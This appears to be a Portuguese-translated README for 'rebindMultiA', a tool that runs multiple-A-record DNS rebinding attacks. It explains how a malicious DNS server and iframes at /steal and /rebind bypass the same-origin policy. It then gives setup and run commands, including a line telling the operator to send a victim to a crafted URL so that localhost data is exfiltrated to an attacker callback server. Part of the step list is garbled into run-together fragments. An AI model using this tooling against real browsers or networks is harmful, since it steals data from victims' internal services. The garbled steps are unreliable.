
Ferramenta de ataque de reassociação de DNS que explora múltiplos registros A para contornar a política de mesma origem e exfiltrar dados de serviços de rede interna por meio do comportamento de fallback do navegador.
rebindMultiA é uma ferramenta para realizar um ataque de rebind de Múltiplos Registros A.
rebindmultia.com é um domínio que configurei para auxiliar nesses ataques. Ele faz com que cada IP seja seu próprio servidor de nomes autoritativo para o domínio [IP].ns.rebindmultia.com. Por exemplo, o servidor de nomes autoritativo de 13.33.33.37.ns.rebindmultia.com é 13.33.33.37.ip.rebindmultia.com, que resolve (como você deve ter adivinhado) para 13.33.33.37.
O ataque de Rebind de MultiRegistro A é uma variante do DNS Rebinding que explora a capacidade de um atacante de responder com dois endereços IP em resposta a uma solicitação DNS e a tendência do navegador de cair de volta para o segundo IP na resposta DNS quando o primeiro não responde. Neste ataque, o atacante configurará um servidor DNS malicioso e dois servidores HTTP maliciosos. O servidor DNS responderá com dois registros A:
127.0.0.1.target.13.33.33.37.ns.rebindmultia.com. 0 IN A 13.33.33.37
127.0.0.1.target.13.33.33.37.ns.rebindmultia.com. 0 IN A 127.0.0.1
O navegador da vítima então se conectará ao primeiro IP e começará a interagir com o primeiro servidor HTTP malicioso do atacante. Este servidor responderá com uma página que contém dois iframes, um para /steal e outro para /rebind. O iframe /steal carregará uma página maliciosa para acessar o segundo iframe e capturar o conteúdo. O endpoint /rebind, quando acessado, emitirá um redirecionamento 302 para / e eliminará o primeiro servidor HTTP malicioso. Como resultado, quando o navegador tentar novamente acessar o servidor HTTP do atacante, encontrará uma porta fechada. Como tal, ele cairá de volta para o segundo IP. Uma vez que o conteúdo alvo tenha sido carregado no segundo iframe, o primeiro iframe pode acessá-lo, roubar os dados e exfiltrá-los para o segundo servidor HTTP malicioso do atacante - o servidor de callback.
Este ataque funciona apenas em ambiente Windows. Linux e Mac usarão o IP privado primeiro e o servidor do atacante nunca será consultado.

127.0.0.1.target.13.33.33.37.ns.rebindmultia.com.server.py) analisa o nome DNS solicitado e retorna dois registros A: 13.33.33.37 e 127.0.0.1.server.py) e carrega a página /parent que contém dois iframes./steal do servidor HTTP malicioso do atacante./rebind que resulta em um redirecionamento 302 para / (o servidor HTTP será encerrado após esta solicitação)./ conforme o 302 do servidor do atacante./ do servidor HTTP do atacante (agora inativo), mas falha.pip3 install -r requirements.txt
python3 server.py --help
usage: server.py [-h] [-p PORT] [-c CALLBACK_PORT] [-d DNS_PORT] [-f FILE] [-l LOCATION]
argumentos opcionais:
-h, --help mostra esta mensagem de ajuda e sai
-p PORT, --port PORT Especifica a porta para atacar no IP alvo. Padrão: 80
-c CALLBACK_PORT, --callback-port CALLBACK_PORT
Especifica a porta do servidor HTTP de callback. Padrão: 31337
-d DNS_PORT, --dns-port DNS_PORT
Especifica a porta do servidor DNS. Padrão: 53
-f FILE, --file FILE Especifica o arquivo HTML a ser exibido no primeiro iframe. (O iframe "steal"). Padrão: steal.html
-l LOCATION, --location LOCATION
Especifica a localização dos dados que você deseja roubar no alvo. Padrão: /
Se você receber este erro:
┬─[justin@RhynoDroplet:~/p/rebindMultiA]─[14:26:24]─[G:master=]
╰─>$ python3 server.py
Traceback (most recent call last):
File "server.py", line 2, in <module>
from http.server import HTTPServer, BaseHTTPRequestHandler, ThreadingHTTPServer
ImportError: cannot import name 'ThreadingHTTPServer'
Então você precisa usar uma versão mais atualizada do Python. Python 3.7+.
Isso deve ser executado a partir de um IP publicamente acessível.
git clone https://github.com/Rhynorater/rebindMultiA
cd rebindMutliA
pip3 install -r requirements.txt
echo "Envie sua vítima para http://127.0.0.1.target.`curl -s http://ipinfo.io/ip`.ns.rebindmultia.com/parent para exfiltrar 127.0.0.1"
sudo python3 server.py
127.0.0.1. Em seguida, ele se conecta a esse servidor e carrega a página no iframe.steal do atacante acessa o segundo iframe recém-carregado e captura o conteúdo.steal do atacante então envia os resultados de volta para o servidor de callback do atacante.